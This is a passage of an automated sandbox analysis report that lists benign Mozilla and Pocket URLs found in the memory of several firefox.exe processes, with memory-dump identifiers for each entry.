Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3012755816.000001DEEAC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E730000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.